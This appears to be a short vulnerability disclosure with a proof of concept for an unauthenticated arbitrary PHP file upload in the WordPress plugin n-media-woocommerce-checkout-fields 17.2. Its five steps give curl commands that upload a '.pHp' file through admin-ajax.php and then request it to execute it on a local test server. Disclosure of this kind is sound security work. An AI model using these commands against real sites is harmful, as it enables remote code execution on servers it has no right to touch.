The plugin does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server
1. Install and activate woocommerce (dependency, no setup required) 2. Install and active the vulnerable plugin (n-media-woocommerce-checkout-fields 17.2) 3. Prepare the payload: echo ‘’ > /tmp/payload.php 4. Invoke the following curl command to upload the payload (notice the name parameter is set to “.pHp”): curl -i ‘http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=cfom_upload_file&name;=payload.pHp’ \ -F ‘file=@/tmp/payload.php’ 5. Trigger the payload: curl -i ‘http://127.0.0.1:7777/wp-content/uploads/cfom_files/payload.php’